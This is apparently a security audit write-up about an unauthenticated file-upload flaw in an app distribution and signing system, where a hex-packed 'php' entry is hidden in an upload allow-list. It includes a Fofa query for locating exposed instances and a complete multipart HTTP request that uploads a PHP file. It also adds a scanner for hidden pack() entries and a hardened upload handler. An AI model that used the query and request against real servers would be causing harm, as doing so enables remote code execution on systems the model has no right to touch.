0x00 Preface
Fofa:"statics/css/swiper.min.css" && "/user/messages/dialog"
0x01 Unauthenticated (front-end) arbitrary file upload vulnerability
After a pass with Seay, I found that every file under /source/pack/upload/2upload had been obfuscated, but only with a simple eval-based encoding; an online decoder handles it directly, or you can work through it by hand.

Decoding them one by one, nearly all of them are whitelist-based uploads, but in /source/pack/upload/2upload/index-uplog.php I found something different: this upload whitelist additionally contains pack('H*', 706870).
```php
// Decrypted source
if (!empty($_FILES)) {
    $filepart  = pathinfo($_FILES['app']['name']);
    $extension = strtolower($filepart['extension']);
    if (in_array($extension, array('ipa', 'apk', 'mobileconfig', pack('H*', 706870)))) {
        $time = $_POST['time'];
        preg_match('/^(\d+\-\d+)$/', $time) or exit('-1');
        $dir = '../../../data/tmp/' . $time . '/';
        if (!is_dir($dir)) {
            @mkdir($dir, 0777, true);
        }
        $file = '../../../data/tmp/' . $time . '.' . $extension;
        @move_uploaded_file($_FILES['app']['tmp_name'], $file);
        if ($extension == 'ipa') {
            include_once '../zip/zip.php';
            $zip = new PclZip($file);
            $zip->extract(PCLZIP_OPT_PATH, $dir, PCLZIP_OPT_BY_PREG, '/^Payload\/.*.app\/Info.plist$/');
            $zip->extract(PCLZIP_OPT_PATH, $dir, PCLZIP_OPT_BY_PREG, '/^Payload\/.*.app\/embedded.mobileprovision$/');
            $zip->extract(PCLZIP_OPT_PATH, $dir, PCLZIP_OPT_BY_PREG, '/^Payload\/.*.app\/(?!.*\/).*.png$/');
        }
        echo "{'extension':'{$extension}','time':'{$time}'}";
    } else {
        echo '-1';
    }
}
```
pack('H*', 706870) packs the hex digits into a binary string; running the call outside the application shows what it actually yields:

```php
echo pack('H*', 706870);
```

It is simply php. The author added php to the whitelist of this upload point and, on top of that, eval-obfuscated the code; the intent is plain to see, and readers can draw their own conclusions.
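The manual step the author took (decode the obfuscated file, then notice the hex-packed whitelist entry) can be made a repeatable audit check. The block below is an added example written for this write-up, not code from the original post or from the audited system: it scans PHP source for pack('H*', ...) literals and for eval() wrapped around common decoders, and reports what each hex literal decodes to. The directory argument and the constructed sample line are assumptions.

```php
<?php
// Audit helper (added example, not from the original post or the audited
// system): report hex-packed string literals such as pack('H*', 706870) and
// eval() wrapped around common decoders, so hidden entries in an upload
// whitelist stand out during source review.

function lineOf(string $source, int $offset): int {
    return substr_count(substr($source, 0, $offset), "\n") + 1;
}

// Find pack('H*', <hex>) with the hex given bare or quoted, and decode it the
// same way PHP would, so odd-length input is handled exactly like the target.
function decodeHexPackLiterals(string $source): array {
    $pattern = '/\bpack\s*\(\s*([\'"])H\*\1\s*,\s*([\'"]?)([0-9A-Fa-f]+)\2\s*\)/';
    $found = [];
    if (preg_match_all($pattern, $source, $m, PREG_SET_ORDER | PREG_OFFSET_CAPTURE)) {
        foreach ($m as $match) {
            $found[] = [
                'line'    => lineOf($source, $match[0][1]),
                'literal' => $match[0][0],
                'decoded' => pack('H*', $match[3][0]),
            ];
        }
    }
    return $found;
}

// eval() fed by a decoder is the "simple eval encryption" the post describes.
function findEvalWrappers(string $source): array {
    $pattern = '/\beval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(/i';
    $found = [];
    if (preg_match_all($pattern, $source, $m, PREG_SET_ORDER | PREG_OFFSET_CAPTURE)) {
        foreach ($m as $match) {
            $found[] = ['line' => lineOf($source, $match[0][1]), 'decoder' => strtolower($match[1][0])];
        }
    }
    return $found;
}

function reportFile(string $label, string $source): void {
    foreach (findEvalWrappers($source) as $hit) {
        printf("%s:%d eval(%s(...)) wrapper, decode before auditing\n", $label, $hit['line'], $hit['decoder']);
    }
    foreach (decodeHexPackLiterals($source) as $hit) {
        printf("%s:%d %s decodes to %s\n", $label, $hit['line'], $hit['literal'], var_export($hit['decoded'], true));
    }
}

// Constructed sample (assumption): the key line from the decoded handler above.
$sample = <<<'PHP'
if (in_array($extension, array('ipa', 'apk', 'mobileconfig', pack('H*', 706870)))) {
PHP;

if (isset($argv[1]) && is_dir($argv[1])) {
    // Walk a source tree given on the command line, e.g. the 2upload directory.
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($argv[1], FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $path => $info) {
        if ($info->isFile() && strtolower($info->getExtension()) === 'php') {
            reportFile($path, (string) file_get_contents($path));
        }
    }
} else {
    reportFile('sample', $sample);
}
```

Run it with a directory argument to walk a source tree, or without arguments to see it decode the constructed sample line. Decoding with pack() rather than hex2bin() matters because the scanner should report the exact string the target code would compare against, including the case where an odd number of hex digits is padded.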
Uploading a file directly still does not work, because there is also a regex restriction: preg_match('/^(\d+\-\d+)$/', $time) or exit('-1'); if the input does not match the regex it returns -1 immediately. When in doubt, just ask ChatGPT 4.

So the parameter must consist of digits with a - in between, otherwise the regex cannot be satisfied. So, let's construct the payload directly:
```http
POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 290
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpWhy
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/source/pack/upload/2upload/index-uplog.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="time"

1-2
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="app"; filename="1.php"
Content-Type: image/jpeg

phpinfo();
------WebKitFormBoundary03rNBzFMIytvpWhy--
```
The file is uploaded to /source/data/tmp/1-2.php.

Originally published on the WeChat Official Account 星悦安全: 某度APP分发签名系统审计 (Audit of a certain "Du" APP distribution and signing system).
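From the defensive side, the handler has four separable defects: an allow-list that hides an executable extension behind pack(), a ^...$ regex whose $ tolerates a trailing newline, a world-writable upload directory created with errors silenced, and a storage path that is reachable under the document root (which is why the upload lands at a browsable /source/data/tmp/1-2.php). The block below is an added example written for this write-up, not the vendor's code or a patch from the project: it keeps the same form fields ('app' and 'time') and the same storage root, and corrects each point. UPLOAD_ROOT and the note about disabling script execution in that directory are assumptions.

```php
<?php
// Hardened replacement for the upload handler (added example, not the vendor's
// code). Same form fields as the original: file field 'app', text field 'time'.

// A literal allow-list: nothing hidden behind pack()/hex2bin(), and no
// extension the web server could hand to the PHP interpreter.
const ALLOWED_EXTENSIONS = ['ipa', 'apk', 'mobileconfig'];

// Assumption: same storage root as the original handler. The directory should
// also have script execution disabled in the web server configuration, so a
// stray file there is served as data rather than run.
const UPLOAD_ROOT = __DIR__ . '/../../../data/tmp';

// Return the validated value or null. \A and \z replace ^ and $ so that a
// trailing newline ("1-2\n") is rejected instead of being copied into the path.
function validateTime(string $time): ?string {
    if (strlen($time) > 32 || !preg_match('/\A\d+-\d+\z/', $time)) {
        return null;
    }
    return $time;
}

// Strict comparison against the literal list; an empty or unknown extension
// (including php, however it is spelled) is rejected.
function validateExtension(string $clientName): ?string {
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    return $ext;
}

function handleUpload(array $files, array $post): array {
    if (empty($files['app']) || ($files['app']['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'reason' => 'no file'];
    }
    $ext  = validateExtension((string) $files['app']['name']);
    $time = validateTime((string) ($post['time'] ?? ''));
    if ($ext === null || $time === null) {
        // One generic answer for both failures; the original echoed -1 as well.
        return ['ok' => false, 'reason' => 'rejected'];
    }

    // Directory is created owner/group-only instead of 0777, and mkdir errors
    // are checked rather than silenced with @.
    $dir = UPLOAD_ROOT . '/' . $time;
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return ['ok' => false, 'reason' => 'storage'];
    }

    // Server-chosen filename built only from validated parts; is_uploaded_file
    // confirms the temp path really came from this request.
    $dest = UPLOAD_ROOT . '/' . $time . '.' . $ext;
    $tmp  = $files['app']['tmp_name'];
    if (!is_uploaded_file($tmp) || !move_uploaded_file($tmp, $dest)) {
        return ['ok' => false, 'reason' => 'storage'];
    }
    return ['ok' => true, 'extension' => $ext, 'time' => $time];
}

if (PHP_SAPI === 'cli') {
    // Offline check with constructed inputs (assumption): the values from the
    // request above, plus a newline-suffixed time, against the new validators.
    var_dump(validateExtension('1.php'));
    var_dump(validateExtension('release.apk'));
    var_dump(validateTime("1-2\n"));
    var_dump(validateTime('1-2'));
} else {
    header('Content-Type: application/json');
    echo json_encode(handleUpload($_FILES, $_POST));
}
```

Run from the command line it only exercises the two validators on constructed inputs; as a web handler it answers with real JSON rather than the original single-quoted pseudo-JSON string. The allow-list is deliberately a plain literal so that a reviewer can read it without decoding anything, which is exactly the property the pack('H*', ...) entry defeated.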